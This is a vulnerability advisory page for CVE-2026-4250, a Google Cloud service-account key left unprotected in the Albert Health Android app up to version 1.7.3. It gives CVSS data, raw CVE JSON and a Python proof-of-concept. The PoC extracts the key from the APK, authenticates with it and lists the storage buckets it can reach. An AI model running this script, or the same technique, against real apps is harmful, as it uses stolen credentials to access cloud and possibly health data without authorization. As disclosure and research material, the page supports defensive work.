Security Vulnerability Report
中文
CVE-2026-4250 CVSS 2.5 LOW

CVE-2026-4250

Published: 2026-03-16 16:16:18
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was found in Albert Sağlık Hizmetleri ve Ticaret Albert Health up to 1.7.3 on Android. Affected is an unknown function of the file resources/assets/service-account.json of the component Google Cloud Service Account Key Handler. Performing a manipulation results in unprotected storage of credentials. The attack requires a local approach. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
2.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Albert Health Android应用 <= 1.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-4250 PoC - Albert Health Service Account Key Extraction # This PoC demonstrates the credential exposure vulnerability import os import zipfile import json import requests from google.oauth2 import service_account from google.cloud import storage def extract_apk_credentials(apk_path): """Extract service account credentials from APK file""" try: with zipfile.ZipFile(apk_path, 'r') as zip_ref: # Target file path in the APK target_file = 'assets/service-account.json' if target_file in zip_ref.namelist(): credential_data = zip_ref.read(target_file) return json.loads(credential_data) except Exception as e: print(f"Error extracting APK: {e}") return None def exploit_google_cloud(credentials): """Use leaked credentials to access Google Cloud services""" try: # Authenticate with leaked service account scopes = ['https://www.googleapis.com/auth/cloud-platform'] credentials_obj = service_account.Credentials.from_service_account_info( credentials, scopes=scopes ) # List accessible Cloud Storage buckets storage_client = storage.Client(credentials=credentials_obj) buckets = list(storage_client.list_buckets()) print(f"[+] Successfully authenticated as: {credentials.get('client_email')}") print(f"[+] Found {len(buckets)} accessible storage buckets:") for bucket in buckets: print(f" - {bucket.name}") return True except Exception as e: print(f"[-] Failed to access Google Cloud: {e}") return False def main(): print("=" * 60) print("CVE-2026-4250 PoC - Albert Health Credential Exposure") print("=" * 60) # Step 1: Extract credentials from APK or installed app apk_path = "albert-health-v1.7.3.apk" print("\n[Step 1] Extracting service account credentials...") creds = extract_apk_credentials(apk_path) if creds: print(f"[+] Found credentials for: {creds.get('client_email')}") print(f"[+] Private Key ID: {creds.get('private_key_id')}") # Step 2: Exploit to access Google Cloud print("\n[Step 2] Attempting to access Google Cloud services...") exploit_google_cloud(creds) else: print("[-] Failed to extract credentials") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4250", "sourceIdentifier": "[email protected]", "published": "2026-03-16T16:16:18.497", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Albert Sağlık Hizmetleri ve Ticaret Albert Health up to 1.7.3 on Android. Affected is an unknown function of the file resources/assets/service-account.json of the component Google Cloud Service Account Key Handler. Performing a manipulation results in unprotected storage of credentials. The attack requires a local approach. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue encontrada en Albert Sa?l?k Hizmetleri ve Ticaret Albert Health hasta la versión 1.7.3 en Android. Afectada es una función desconocida del archivo resources/assets/service-account.json del componente Google Cloud Service Account Key Gestor. Realizar una manipulación resulta en almacenamiento no protegido de credenciales. El ataque requiere un enfoque local. La complejidad de un ataque es bastante alta. Se dice que la explotabilidad es difícil. El exploit ha sido hecho público y podría ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.5, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 1.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-255"}, {"lang": "en", "value": "CWE-256"}]}], "references": [{"url": "https://vuldb.com/?ctiid.351208", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351208", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771435", "source": "[email protected]"}, {"url": "https://www.notion.so/Google-Cloud-Service-Account-Key-Exposure-Leading-to-Unauthorized-Data-Access-in-albert-health-3192de3f97fb800d8ebddef9f259223b?source=copy_link", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.